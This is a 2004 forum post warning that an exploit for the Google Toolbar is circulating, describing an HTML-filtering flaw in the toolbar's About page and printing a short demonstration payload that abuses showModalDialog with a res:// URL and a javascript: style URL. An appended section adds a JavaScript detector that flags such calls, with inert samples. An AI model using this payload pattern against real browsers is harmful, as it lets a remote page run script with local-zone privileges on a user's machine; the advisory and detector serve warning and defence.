09-18-2004, 08:21 AM
hydro
Careful, exploit for Google Toolbar is out

A remote user can execute arbitrary scripting code in the Local Computer security zone.

It is reported that the 'About' section of the Google Toolbar does not properly filter HTML code. A remote user can create HTML that, when loaded by the target user, will invoke the About page and execute arbitrary scripting code in the context of the page.

A demonstration exploit is provided:

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>
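Added example, not part of hydro's post and not Google's code: a JavaScript check that a content filter or code reviewer could run over page source to flag the call shape described above, a showModalDialog call that opens a local res: resource and hands it markup or a script URL as the dialog argument. The function name, field names and sample inputs are assumptions constructed for this example.

```javascript
// Added example. Flags showModalDialog calls whose first argument is a
// res: URL, and reports whether the dialog argument carries markup or a
// script URL. Limitation: only matches direct calls with quoted literals.
const CALL = /showModalDialog\s*\(\s*/g;
const STR = /(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1/y; // one quoted literal
const COMMA = /\s*,\s*/y;

// Run a sticky regex at an exact offset in the text.
function readAt(re, text, pos) {
  re.lastIndex = pos;
  return re.exec(text);
}

function findResDialogCalls(source) {
  const findings = [];
  for (const call of source.matchAll(CALL)) {
    let pos = call.index + call[0].length;
    const url = readAt(STR, source, pos);
    if (!url || !/^res:/i.test(url[2])) continue; // only local resource URLs
    pos += url[0].length;
    const comma = readAt(COMMA, source, pos);
    const arg = comma ? readAt(STR, source, pos + comma[0].length) : null;
    const argText = arg ? arg[2] : "";
    findings.push({
      url: url[2],
      passesMarkup: /<\s*[a-z!\/]/i.test(argText),
      passesScriptUrl: /(?:javascript|vbscript)\s*:/i.test(argText),
    });
  }
  return findings;
}

// Constructed sample inputs (placeholder DLL path, inert script URL).
const SAMPLE_FLAGGED = String.raw`<script>
window.showModalDialog("res://C:\\example\\sample.dll/PAGE.HTML",
"<div style=\"background-image: url(javascript:void(0));\">");
</script>`;
const SAMPLE_PLAIN_ARG = String.raw`<script>
window.showModalDialog("res://C:\\example\\sample.dll/PAGE.HTML", "topic=1");
</script>`;
const SAMPLE_BENIGN = `<script>
window.showModalDialog("help.html", "topic=1");
</script>`;

console.log(findResDialogCalls(SAMPLE_FLAGGED));
```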